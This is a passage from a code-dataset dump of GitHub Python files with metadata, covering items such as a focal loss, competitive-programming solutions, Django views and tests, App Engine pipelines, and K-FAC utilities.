N*H*W,C\n target = target.view(-1, 1)\n\n logpt = F.log_softmax(input)\n logpt = logpt.gather(1, target)\n logpt = logpt.view(-1)\n pt = Variable(logpt.data.exp())\n\n if self.alpha is not None:\n if self.alpha.type() != input.data.type():\n self.alpha = self.alpha.type_as(input.data)\n at = self.alpha.gather(0, target.data.view(-1))\n logpt = logpt * Variable(at)\n\n loss = -1 * (1 - pt) ** self.gamma * logpt\n if self.size_average:\n return loss.mean()\n else:\n return loss.sum()\n","repo_name":"namphuongtran9196/3m-ser","sub_path":"src/models/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":7862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39806578986","text":"scores = {}\r\nfor _ in range(int(input())):\r\n score, name = input().split()\r\n scores[name] = int(score)\r\n\r\nfor _ in range(int(input())):\r\n p1, p2, res = input().split()\r\n res = int(res)\r\n \r\n if res == 0:\r\n sp1, sp2 = 0.5, 0.5\r\n elif res == 1:\r\n sp1, sp2 = 1, 0\r\n elif res == 2:\r\n sp1, sp2 = 0, 1\r\n \r\n dp1 = 15 * (sp1 - 1 / (1 + pow(10, (scores[p2] - scores[p1]) / 400)))\r\n dp2 = 15 * (sp2 - 1 / (1 + pow(10, (scores[p1] - scores[p2]) / 400)))\r\n\r\n scores[p1] = max(int(scores[p1] + dp1), 0)\r\n scores[p2] = max(int(scores[p2] + dp2), 0)\r\n\r\nfor name, score in sorted(scores.items(), key=lambda x: (-x[1], x[0])):\r\n print(score, name)","repo_name":"juwkim/boj","sub_path":"백준/Bronze/29677. 
ШАШКА/ШАШКА.py","file_name":"ШАШКА.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"36514745292","text":"import traceback\nfrom logging.config import dictConfig\nfrom pathlib import Path\n\nfrom colorlog import ColoredFormatter\n\nimport settings\n\n__all__ = [\"setup_logging\"]\n\nLOGS_TO_SUPPRESS = tuple()\nROOT = Path(__file__).parent.parent\nTRACEBACK_ANALYSE_LIMIT = 20\n\n\nclass LogFormatter(ColoredFormatter):\n \"\"\"Formatter that adds extra logging info.\"\"\"\n\n @staticmethod\n def _extract_exc_location(exc_tb):\n \"\"\"Lookup traceback for the lowest line of source code.\n\n Provide extra context if a line is found within the limit.\n \"\"\"\n local_code_frame = None\n local_code_path = None\n\n for frame in traceback.extract_tb(exc_tb, limit=TRACEBACK_ANALYSE_LIMIT):\n frame_path = Path(frame.filename)\n if ROOT not in frame_path.parents:\n break\n local_code_frame, local_code_path = frame, frame_path\n\n if not local_code_frame:\n return {}\n\n module = local_code_path.relative_to(ROOT)\n return {\n \"location\": \".\".join(module.parts[:-1] + (module.stem, local_code_frame.name)),\n \"line\": repr(local_code_frame.line),\n }\n\n\ndef setup_logging(name: str = settings.LOGGER_NAME, full_log_file_name: str = settings.LOGS_FILE_NAME_PATH):\n \"\"\"Set up the logging.\"\"\"\n log_level = \"INFO\"\n config = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"default\": {\n \"()\": LogFormatter,\n \"fmt\": f\"%(log_color)s %(asctime)s %(levelname)s [%(name)s] %(message)s %(reset)s\",\n \"datefmt\": \"%Y-%m-%d %H:%M:%S\",\n \"log_colors\": {\n \"DEBUG\": \"cyan\",\n \"INFO\": \"green\",\n \"WARNING\": \"yellow\",\n \"ERROR\": \"red\",\n \"CRITICAL\": \"red\",\n },\n }\n },\n \"handlers\": {\n \"default\": {\"class\": \"logging.StreamHandler\", \"level\": log_level, \"formatter\": \"default\"},\n \"file\": {\n \"class\": \"logging.handlers.TimedRotatingFileHandler\",\n \"level\": log_level,\n \"formatter\": \"default\",\n \"filename\": full_log_file_name,\n \"encoding\": \"utf-8\",\n \"backupCount\": settings.env.BACKUP_LOGS_AMOUNT,\n \"interval\": settings.env.DAYS_TILL_NEW_LOG_FILE,\n \"when\": \"midnight\",\n },\n },\n \"loggers\": {name: {\"level\": log_level}, **{k: {\"level\": \"WARNING\"} for k in LOGS_TO_SUPPRESS}},\n \"root\": {\"level\": log_level, \"handlers\": [\"default\", \"file\"]},\n }\n dictConfig(config)\n","repo_name":"devProdigy/scam_finder","sub_path":"app/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42102219540","text":"# baekjoon - [15683]감시 (2020-10-15)\n# https://www.acmicpc.net/problem/15683\nfrom pprint import pprint\nimport sys\nsys.stdin = open(\"baekjoon/[15683]감시.txt\",'r')\n\ndef solution(y, x, num) :\n global blind\n dy = [-1, 0, 1, 0]\n dx = [0, 1, 0, -1]\n\n cctv = {\n 1 : [[0], [1], [2], [3]],\n 2 : [[0,2], [1,3]],\n 3 : [[0,1], [1,2], [2,3], [3,0]],\n 4 : [[0,1,2], [1,2,3], [2,3,0], [3,0,1]],\n 5 : [[0,1,2,3]]\n }\n cam = [[] for _ in range(len(cctv[num]))]\n view = [[] for _ in range(len(cctv[num]))]\n max_val = 0\n\n for i in range(len(cctv[num])):\n cnt = 0\n for j in cctv[num][i] : # 수정\n p = 1\n while(True) :\n ny = y + dy[j] * p\n nx = x + dx[j] * p\n p += 1\n\n # print((ny,nx))\n if 0 <= ny < N and 0 <= nx < M :\n if mat[ny][nx] == 6 :\n break\n elif mat[ny][nx] == 
0 :\n cam[i].append((ny,nx))\n cnt += 1\n else :\n break\n\n\n view[i].append(cnt)\n \n max_val = view.index(max(view))\n for c in cam[max_val] :\n ny, nx = c\n mat[ny][nx] = -1\n \n blind -= max(view)[0]\n\n\n\nT = int(input())\nfor t in range(1, T+1):\n N, M = map(int, input().split())\n mat = [list(map(int, input().split())) for _ in range(N)]\n visited = [[False for _ in range(M)] for _ in range(N)]\n blind = 0\n \n\n for i in range(N):\n for j in range(M):\n if mat[i][j] == 0 :\n blind += 1\n\n for i in range(N):\n for j in range(M) :\n if mat[i][j] == 6 :\n visited[i][j] = True\n elif 1 <= mat[i][j] <= 5 :\n visited[i][j] = True\n solution(i, j, mat[i][j]) # cctv 위치\n\n if t == 18 :\n pprint(mat)\n print(blind)\n \n\n","repo_name":"DailyCodingMem/DailyCoding","sub_path":"zjohn99/baekjoon/[15683]감시.py","file_name":"[15683]감시.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35300793878","text":"# #list comprehension\n# #new_list = [do_something_to_each_item_in_list for item in list]\n# #one line of code to do something to each item in list to make a new list \n\n# numbers = [1, 2, 3]\n# new_numbers = [n + 1 for n in numbers]\n# print(new_numbers)\n\n# #each letter in the name is a separate string in a list\n# name = \"angela\"\n# new_letters = [letter for letter in name]\n# print(new_letters)\n\n# new_range = [n*2 for n in range(1,5)]\n# print(new_range)\n\n# #conditional list comprehension\n# #new_list = [new_item for item in list if test]\n\n# names = [\"Alex\", \"Carissa\", \"Beth\"]\n# short_names = [name for name in names if len(name) < 5]\n# print(short_names)\n\n# uppercase_long_names = [name.upper() for name in names if len(name) > 5]\n# print(uppercase_long_names)\n\n# #dictionary comprehension\n# #new_dict = {new_key:new_value for item in list}\n# #new_dict = {new_key:new_value for (key,value) in dict.items() if test}\n# import random\n# #give random score to each name in list, put in dictionary\n# names = [\"Alex\", \"Carissa\", \"Beth\"]\n# student_scores = {student:random.randint(1, 100) for student in names}\n# print(student_scores)\n\n# passed_students = {student:score for (student,score) in student_scores.items() if score >= 80}\n# print(passed_students)\n\n# #iterate over pandas dataframe\nimport pandas\n\nstudent_dict = {\n \"student\": [\"Angela\", \"James\", \"Lily\"],\n \"score\": [56, 76, 98]\n}\n\nstudent_data_frame = pandas.DataFrame(student_dict)\nprint(student_data_frame)\n\n#loop through data frame\n#rows, each student, each score\nfor (index, row) in student_data_frame.iterrows():\n if row.student == \"Angela\":\n print(row.score)\n\n# new_dictionary = {new_key:new_value} for (index, row) in df.itterows()}","repo_name":"carissa406/100-days-of-code","sub_path":"Day 26/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11157080929","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport mpl_toolkits.mplot3d as Axes3D\nimport pandas as pd\n\nobservations = 1000\n##two variable method F(x,x2) = ax+bx2+C\n##create the inputs of two randomly generated sets and combine them using column stack\nxs = np.random.uniform(low=-10, high=10, size=(observations,1))\nzs = np.random.uniform(-10,10,(observations,1))\n\ninputs = np.column_stack((xs,zs))\n\n##Create Targets\n##targets have noise to model real data\nnoise = 
np.random.uniform(-1,1,(observations,1))\n\n##create the targets\ntargets = 2*xs -3*zs + 5 + noise\n\n#Plot the training data\n# targets = targets.reshape(observations,)\n# fig = plt.figure()\n# ax = fig.add_subplot(111,projection='3d')\n# ax.plot(xs,zs,targets)\n# ax.set_xlabel('xs')\n# ax.set_ylabel('zs')\n# ax.set_zlabel('Targets')\n# ax.view_init(azim=100)\n# # plt.show()\n# targets=targets.reshape(observations,1)\n\n#initialize weights\ninit_range = 0.1\nweights = np.random.uniform(-init_range, init_range, size=(2,1))\nbiases = np.random.uniform(-init_range, init_range, size=1)\nlearning_rate = 0.02\n\nfor i in range(100):\n outputs = np.dot(inputs, weights) + biases ##calculates the outs for comparison\n deltas = outputs - targets ##determines the loss difference between the outputs and the targets\n loss=np.sum(deltas**2)/ 2 / observations ##Determines to loss of our function(we attempt to minimize this)\n # print(loss)\n deltas_scaled=deltas/observations ##Scale the deltas for each operation\n weights = weights-learning_rate*np.dot(inputs.T,deltas_scaled) #Adjust the weights according to the opimization formula\n biases = biases - learning_rate*np.sum(deltas_scaled)##adjust the biases according to the optimization formula\n\n# print(weights)\n# print(biases)\n# plt.plot(outputs,targets)\n# plt.xlabel('outputs')\n# plt.ylabel('targets')\n# # plt.show()\n","repo_name":"Tannerbraithwaite/ML-DSeg","sub_path":"NeuralNetworks.py","file_name":"NeuralNetworks.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"457527854","text":"from datetime import datetime\nfrom google.appengine.api import app_identity\nfrom google.appengine.api import taskqueue\nfrom mapreduce import base_handler\nfrom mapreduce import mapreduce_pipeline\nfrom todo.blueprints import app_user\nfrom todo.models.calendar import Calendar\nfrom todo.models.event import Event\n\n\nclass ExportPipeline(base_handler.PipelineBase):\n\n def run(self, *args, **kwargs):\n params = {\n 'entity_kind': 'todo.models.user.User',\n 'output_writer': {\n 'bucket_name': app_identity.get_default_gcs_bucket_name(),\n 'content_type': 'text/plain',\n },\n }\n yield mapreduce_pipeline.MapperPipeline(\n 'export',\n 'todo.pipelines.ExportPipeline.map',\n 'mapreduce.input_readers.DatastoreInputReader',\n 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter',\n params=params)\n\n @staticmethod\n def map(user):\n tag = '\"%s\"' % user.get_hash()\n days = (datetime.now() - user.created).days\n\n calendars = 0\n todos = 0\n completed = 0\n for calendar in Calendar.get_all(user.key):\n calendars += 1\n for event in Event.get_all(calendar.key):\n todos += 1\n if event.done:\n completed += 1\n\n row = (tag, days, calendars, todos, completed)\n row = [str(col) for col in row]\n yield (','.join(row) + '\\n')\n\nclass SyncPipeline(base_handler.PipelineBase):\n\n def run(self, *args, **kwargs):\n params = {\n 'entity_kind': 'todo.models.user.User',\n }\n yield mapreduce_pipeline.MapperPipeline(\n 'sync',\n 'todo.pipelines.SyncPipeline.map',\n 'mapreduce.input_readers.DatastoreInputReader',\n params=params)\n\n @staticmethod\n def map(user):\n task_url = '/api/v1/queues/sync/user'\n params = {\n 'user_id': user.key.urlsafe()\n }\n\n try:\n if user.synced is not None:\n taskqueue.add(url=task_url, params=params)\n except AttributeError:\n pass\n\nclass IndexPipeline():\n\n @staticmethod\n def map(user):\n 
user.index()\n\n","repo_name":"slackpad/hashtagtodo","sub_path":"todo/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"19598900728","text":"# 청소년 상어\nimport sys\nimport copy\nIn = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n'''\n== direction ==\n↑, ↖, ←, ↙, ↓, ↘, →, ↗\n1, 2, 3, 4, 5, 6, 7, 8\n\n== numbering ==\nblank : -1\nshark : 0\n'''\n\ndirect = [\n [-1, 0],\n [-1, -1],\n [0, -1],\n [1, -1],\n [1, 0],\n [1, 1],\n [0, 1],\n [-1, 1]\n]\n\nanswer = 0\n\n\ndef rotate(fishes, num):\n if fishes[num][0] < 8:\n fishes[num][0] += 1\n else:\n fishes[num][0] = 1\n\n\ndef fish_moving(fishes, spaces, die):\n for i in range(1, 17):\n if i in die:\n continue\n\n direction = fishes[i][0]\n pos_x, pos_y = fishes[i][1]\n dx, dy = direct[direction-1]\n new_x, new_y = pos_x + dx, pos_y + dy\n\n while True:\n if 0 <= new_x < 4 and 0 <= new_y < 4 and spaces[new_x][new_y] != 0:\n break\n\n rotate(fishes, i)\n direction = fishes[i][0]\n dx, dy = direct[direction-1]\n new_x, new_y = pos_x + dx, pos_y + dy\n\n if 0 <= new_x < 4 and 0 <= new_y < 4 and spaces[new_x][new_y] != 0:\n if spaces[new_x][new_y] != -1:\n fish = spaces[new_x][new_y]\n fishes[fish][1] = [pos_x, pos_y]\n fishes[i][1] = [new_x, new_y]\n spaces[new_x][new_y] = i\n spaces[pos_x][pos_y] = fish\n else:\n fishes[i][1] = [new_x, new_y]\n spaces[new_x][new_y] = i\n spaces[pos_x][pos_y] = -1\n\n\ndef recursion(fishes, spaces, die, ans):\n global answer\n\n fish_moving(fishes, spaces, die)\n\n spos_x, spos_y = fishes[0][1]\n sdirection = fishes[0][0]\n dx, dy = direct[sdirection-1]\n snew_x, snew_y = spos_x+dx, spos_y+dy\n moving = []\n\n while True:\n if snew_x < 0 or 4 <= snew_x or snew_y < 0 or 4 <= snew_y:\n break\n\n if spaces[snew_x][snew_y] != -1:\n moving.append([snew_x, snew_y])\n\n snew_x, snew_y = snew_x+dx, snew_y+dy\n\n if not moving:\n answer = max(answer, ans)\n return\n\n for item in moving:\n n_spaces = copy.deepcopy(spaces)\n n_fishes = copy.deepcopy(fishes)\n n_die = copy.deepcopy(die)\n\n snew_x, snew_y = item\n eating = spaces[snew_x][snew_y]\n n_die.append(eating)\n new_ans = ans + eating\n n_fishes[0] = fishes[eating]\n n_spaces[spos_x][spos_y] = -1\n n_spaces[snew_x][snew_y] = 0\n\n recursion(n_fishes, n_spaces, n_die, new_ans)\n\n\ndef main():\n global answer\n\n fishes = [0]*17\n spaces = [[0]*4 for _ in range(4)]\n die = []\n\n for i in range(4):\n sub = list(map(int, In().split()))\n for j in range(0, 7, 2):\n spaces[i][j//2] = sub[j]\n fishes[sub[j]] = [sub[j+1], [i, j//2]]\n\n ans = 0\n\n eating = spaces[0][0]\n die.append(eating)\n ans += eating\n fishes[0] = fishes[eating]\n spaces[0][0] = 0\n\n recursion(fishes, spaces, die, ans)\n print(answer)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bn-tw2020/2020_winter_algorithm","sub_path":"participants/Geonil/problem_solving/week10/BOJ19236.py","file_name":"BOJ19236.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"33997741739","text":"#i have created project sonu vishwakarma\r\nfrom django.http import HttpResponse\r\nfrom django.shortcuts import render\r\n\r\ndef index(request):\r\n return render(request ,'index.html')\r\n\r\n\r\n# def index(request):\r\n#\r\n# return HttpResponse(\"

    sonu vishwakarma

    back\")\r\n #to give the link of any website\r\n #to give the link we use ''' dsfdsf'''\r\n # VISHWKARMA''')\r\ndef about(request):\r\n return HttpResponse(\" about hello sonu vishwkarma\"\r\n \"
    sonu
    vishwakarma
    \"\r\n \"sonu\"\r\n\r\n )\r\n\r\ndef home(request):\r\n return HttpResponse(\"this site is homeback\")\r\n\r\ndef contact(request):\r\n #get the text\r\n global params\r\n djtext = request.POST.get('text','default')\r\n Num = request.POST.get('name','default')\r\n fullcap = request.POST.get('uppercase','off')\r\n Error = request.POST.get('error','default')\r\n lenght = request.POST.get('lenghts','default')\r\n extraspace = request.POST.get('space','default')\r\n newlines = request.POST.get('newline','default')\r\n removepunc = request.POST.get('removepunc','off')# you can use off and default\r\n print(removepunc)\r\n analyzed = djtext\r\n num = Num\r\n if removepunc == \"on\":\r\n punctuations = '''!()-[]{};:'\"\\,c<>./?@#$%^&*_~'''\r\n\r\n analyzed = \"\"\r\n for char in djtext:\r\n if char not in punctuations:\r\n analyzed = analyzed + char\r\n\r\n params = {'purpose': 'MIND CODER', 'analyzed_text': analyzed}\r\n djtext =analyzed\r\n # analyzis the text\r\n # return HttpResponse(\"this is contact siteback\")\r\n # return render(request, 'analysis.html', params)\r\n if (fullcap == \"on\"):\r\n analyzed = \"\"\r\n for car in djtext:\r\n analyzed = analyzed + car.upper()\r\n params = {'purpose': 'uppercase', 'analyzed_text': analyzed}\r\n djtext = analyzed\r\n # return render(request, 'analysis.html', params)\r\n if (newlines == \"on\"):\r\n analyzed = \"\"\r\n for char in djtext:\r\n if char != \"\\n\" and char != \"/r\":\r\n analyzed = analyzed + char\r\n else:\r\n print(\"no\")\r\n print(\"pre\", analyzed)\r\n params = {'purpose': 'removed new lines', 'analyzed_text': analyzed}\r\n djtext= analyzed\r\n # return render(request, 'analysis.html', params)\r\n if (extraspace == \"on\"):\r\n analyzed = \"\"\r\n for index, char in enumerate(djtext):\r\n if not (djtext[index] == \" \" and djtext[index + 1] == \" \"):\r\n analyzed = analyzed + char\r\n params = {'purpose': 'space remove', 'analyzed_text': analyzed}\r\n djtext=analyzed\r\n # return render(request, 'analysis.html', params)\r\n if (lenght == \"on\"):\r\n\r\n leng = (len(analyzed))\r\n\r\n params = {'purpose': 'lenght of your text sir', 'analyzed_text': analyzed,'lenght':leng}\r\n djtext=analyzed\r\n # return render(request, 'analysis.html', params)\r\n # return HttpResponse(leng)\r\n\r\n if (removepunc != \"on\" and fullcap != \"on\" and newlines != \"on\" and extraspace != \"on\" and lenght!=\"on\"):\r\n return HttpResponse(\"please the any operation and try again sir\")\r\n return render(request, 'analysis.html', params)\r\n\r\n # else:\r\n # enter = Error\r\n # return HttpResponse(enter)\r\n\r\n\r\ndef link(request):\r\n return HttpResponse(\"this is link back\")","repo_name":"9588sonuvishwakarma/first","sub_path":"our/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"33885786700","text":"from pygame import mixer\nfrom datetime import datetime\nfrom time import time\ndef playmusic(music_name, text_to_stop):\n mixer.init()\n mixer.music.load(music_name)\n mixer.music.play()\n while True:\n a =input()\n if a == text_to_stop :\n mixer.music.stop()\n break\ndef text_log(text):\n with open(\"text_log.txt\", \"a\")as f :\n f.write(f\"{text} {datetime.now()}\\n\")\nif __name__ == '__main__':\n # playmusic(\"water.mp3\", \"stop\")\n water_time = time()\n eyes_time = time()\n excercise_time = time()\n water_duration = 60*40\n eyes_duration = 60*30\n excercise_duration = 60*35\n while True:\n if time() 
- water_time > water_duration:\n print(\"Time for Drinking water,Type 'drank' to off the Alarm\")\n playmusic(\"water.mp3\", \"drank\")\n water_time = time()\n text_log(\"Drank water at \")\n if time() - eyes_time > eyes_duration:\n print(\"Time for Eyes Excercise,Type 'stop' to off the Alarm\")\n playmusic(\"eyes.mp3\", \"stop\")\n eyes_time = time()\n text_log(\"Drank water at \")\n if time() - excercise_time > excercise_duration:\n print(\"Time for Physical Excercise,Type 'done' to off the Alarm\")\n playmusic(\"excercise.mp3\", \"done\")\n excercise_time = time()\n text_log(\"Drank water at \")\n\n\n\n\n","repo_name":"developer-akram/PythonPrograms-Basic_to_Advance-","sub_path":"class1/Health Excerise.py","file_name":"Health Excerise.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3929384564","text":"from rest_framework import status\nfrom rest_framework.test import APITransactionTestCase\nfrom app.models import Appointment, Customer, Job, Address\nfrom booking.models import Order\nfrom booking.serializers import SelectedProductSerializer\nfrom booking.tests.factories import SelectedProductFactory, SubmitBookingFormFactory\nfrom django.db.models import signals\n\n\nclass CustomerOrderTests(APITransactionTestCase):\n\n def test_submit_customer_order(self):\n signals.post_save.disconnect(\n sender=Customer, dispatch_uid=\"emit_identify_to_segment\")\n signals.post_save.disconnect(\n sender=Order, dispatch_uid=\"post_order_to_slack\")\n\n selected_product = SelectedProductFactory.create()\n post_data = SubmitBookingFormFactory.create(\n selected_product=SelectedProductSerializer(selected_product).data\n )\n\n response = self.client.post(\n \"/api/booking/customer_order/\", post_data, format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n address = Address.objects.first()\n customer = Customer.objects.first()\n self.assertEqual(address.id, customer.address.id)\n\n job = Job.objects.first()\n appointment = Appointment.objects.first()\n self.assertEqual(job.appointment.id, appointment.id)\n self.assertEqual(job.customer.id, customer.id)\n\n last_job_note = job.job_notes.last()\n self.assertEqual(last_job_note.note,\n f\"GATE CODE: {customer.address.gate_code}\")\n\n order = Order.objects.first()\n self.assertEqual(order.customer.id, customer.id)\n self.assertEqual(order.appointment.id, appointment.id)\n","repo_name":"josesanchez111622/hb-backend","sub_path":"booking/tests/customer_order.py","file_name":"customer_order.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43011001140","text":"from utils.kfac_utils import (ComputeCovA,\n ComputeCovG,\n ComputeCovA_proper,\n ComputeCovG_proper,\n StoreA,\n StoreG,\n StoreA_proper,\n StoreG_proper,\n rm_hooks)\n\nimport torch\nimport torch.optim as optim\nimport os\nimport json\nfrom tqdm import tqdm\nimport copy\nimport numpy as np\n\ndef get_timestamp_other():\n import time\n import datetime\n ts = time.time()\n # %f allows granularity at the micro second level!\n timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d_%H-%M-%S_%f')\n return timestamp\n\ndef mkdir(path):\n os.makedirs(path, exist_ok=True)\n\nclass dotdict(dict):\n \"\"\" dot.notation access to dictionary attributes \"\"\"\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n\ndef 
tensor_to_list(tensor):\n if len(tensor.shape) == 1:\n return [tensor[_].item() for _ in range(tensor.shape[0])]\n else:\n return [tensor_to_list(tensor[_]) for _ in range(tensor.shape[0])]\n\ndef save_tensor(tens, dump_dir, name):\n torch.save(tens, os.path.join(dump_dir, f'{name}.pt'))\n\ndef get_num_params(model):\n return sum([module.numel() for module in model.parameters()])\n\ndef dump_parameters(args):\n print(\"dumping parameters at \", args.dump_dir)\n with open(os.path.join(args.dump_dir, 'config.txt'), 'w') as outfile:\n if not (type(args) is dict or type(args) is dotdict):\n json.dump(vars(args), outfile, sort_keys=True, indent=4)\n else:\n json.dump(args, outfile, sort_keys=True, indent=4)\n\ndef save_final_model(args, model, optimizer, test_accuracies, dump_name='./kfac_dump', ckpt_type='final'):\n import time\n args.ckpt_type = ckpt_type\n time.sleep(1) # workaround for RuntimeError('Unknown Error -1') https://github.com/pytorch/pytorch/issues/10577\n curr_timestamp = get_timestamp_other()\n if not hasattr(args, 'dump_dir') or args.dump_dir is None:\n args.dump_dir = os.path.join(dump_name, curr_timestamp)\n mkdir(args.dump_dir)\n dump_parameters(args)\n torch.save({\n 'args': vars(args),\n 'epoch': args.epochs,\n 'test_accuracies': test_accuracies,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()\n }, os.path.join(args.dump_dir, 'final_model.pt')\n )\n print(\"Dumped model and optimizer and other meta info\")\n print(\"The path where it is saved is \", os.path.join(args.dump_dir, 'final_model.pt'))\n print(\"The args for this experiment were \", args)\n\ndef get_pretrained_model_optimizer(args, model, optimizer):\n\n assert args.load_model != ''\n if os.path.isfile(args.load_model):\n load_path = args.load_model\n elif os.path.isdir(args.load_model):\n load_path = os.path.join(args.load_model, 'final_model.pt')\n if args.gpu_id != -1:\n state = torch.load(\n load_path,\n map_location=(\n lambda s, _: torch.serialization.default_restore_location(s, 'cuda:' + str(args.gpu_id))\n ),\n )\n else:\n state = torch.load(\n load_path,\n map_location=(\n lambda s, _: torch.serialization.default_restore_location(s, 'cpu')\n ),\n )\n\n print(\"Loading model at path {} which had test accuracy {} at epoch {}\".format(load_path, state['test_accuracies'][-1],\n state['epoch']))\n model.load_state_dict(state['model_state_dict'])\n optimizer.load_state_dict(state['optimizer_state_dict'])\n\n if args.gpu_id != -1:\n model = model.cuda(args.gpu_id)\n\ndef get_sample_args():\n args = {'enable_dropout': False,\n 'MNIST_PATH': '../hessian/files/',\n 'to_download': True,\n 'batch_size_train': 64,\n 'batch_size_test': 1000,\n 'train_bsz': 64,\n 'test_bsz': 1000,\n 'subsample_size': 5000,\n 'momentum': 0.5,\n 'lr': 0.001,\n 'gpu_id': 0,\n 'log_interval': 20,\n 'dump_model': False,\n 'epochs': 10,\n 'load_model': './kfac_dump/2020-03-24_18-56-29_616127',\n 'num_hidden_nodes1': 40,\n 'num_hidden_nodes2': 20,\n 'num_classes':10,\n 'input_size': 784,\n }\n\n return dotdict(args)\n\n## Kronecker utils\ndef kronecker(A, B):\n print(f\"shape of A and B is {A.shape} and {B.shape} resp.\")\n return torch.einsum(\"ab,cd->acbd\", A, B).view(A.size(0)*B.size(0), A.size(1)*B.size(1))\n\ndef kronecker_shape(shape_a, shape_b, idx=-1):\n if idx == -1:\n assert shape_a[0]*shape_b[0] == shape_a[1]*shape_b[1]\n return shape_a[0]*shape_b[0]\n else:\n return shape_a[idx]*shape_b[idx]\n\n\ndef batch_kronecker(A, B, reduce=None, minibsz=-1):\n # Reduce refers to taking the mean of 
the batch of kronecker products computed\n # Also, support mini-batching in reduction mode to save memory!\n assert A.size(0) == B.size(0)\n bsz = A.size(0)\n if reduce is None:\n return torch.einsum('bpq, brs->bprqs', A, B).view(bsz, A.size(1) * B.size(1), A.size(2) * B.size(2))\n else:\n if minibsz == -1:\n if reduce == 'mean':\n return torch.einsum('bpq, brs->bprqs', A, B).mean(dim=0).view(A.size(1) * B.size(1),\n A.size(2) * B.size(2))\n elif reduce == 'sum':\n return torch.einsum('bpq, brs->bprqs', A, B).sum(dim=0).view(A.size(1) * B.size(1),\n A.size(2) * B.size(2))\n else:\n assert bsz % minibsz == 0\n ans = A.new(A.size(1) * B.size(1), A.size(2) * B.size(2)).fill_(0)\n num_iters = int(bsz / minibsz)\n for idx in range(num_iters):\n ans += torch.einsum('bpq, brs->bprqs',\n A[idx * bsz:(idx + 1) * bsz], B[idx * bsz:(idx + 1) * bsz]\n ).sum(dim=0).view(A.size(1) * B.size(1), A.size(2) * B.size(2))\n if reduce == 'mean':\n ans /= bsz\n return ans\n\ndef batch_outer_product(A, B):\n assert A.size(0) == B.size(0)\n # actually this is more of batch of outer products that I have implemented here in!\n return torch.einsum('bp, bq->bpq', A, B).view(A.size(0), A.size(1)*B.size(1))\n\n## Input and Output hooks\ndef _save_input(m_aa, ActHandler):\n def hook(module, input):\n\n aa = ActHandler(input[0].data, module)\n # Initialize buffers\n if steps == 0:\n # basically initializes a matrix of the size of aa,\n # why not simply, xx.new(xx.size()).fill_(0)?\n m_aa[module] = torch.diag(aa.new(aa.size(0)).fill_(0))\n m_aa[module] += aa\n\n return hook\n\ndef _save_input_offdiagonal(s_aa, ActHandler):\n def hook(module, input):\n a = ActHandler(input[0].data, module)\n print('shape of a is ', a.shape)\n # Initialize buffers\n if steps == 0:\n s_aa[module] = a\n else:\n s_aa[module] = torch.cat([s_aa[module], a], 0)\n return hook\n\ndef _save_grad_output(m_gg, GradHandler, batch_averaged=True):\n def hook(module, grad_input, grad_output):\n # Accumulate statistics for Fisher matrices\n gg = GradHandler(grad_output[0].data, module, batch_averaged)\n # Initialize buffers\n if steps == 0:\n m_gg[module] = torch.diag(gg.new(gg.size(0)).fill_(0))\n m_gg[module] += gg\n\n return hook\n\ndef _save_grad_output_offdiagonal(s_gg, GradHandler, batch_averaged=True):\n def hook(module, grad_input, grad_output):\n # Accumulate statistics for Fisher matrices\n g = GradHandler(grad_output[0].data, module, batch_averaged)\n # Initialize buffers\n if steps == 0:\n s_gg[module] = g\n else:\n s_gg[module] = torch.cat([s_gg[module], g], 0)\n return hook\n\n\ndef _prepare_model(model, m_aa, m_gg, s_aa=None, s_gg=None,\n offdiagonal=False, proper=True, fix_layers=0):\n count = 0\n print(model)\n modules = []\n module_names = []\n print(\"=> We keep following layers in model. 
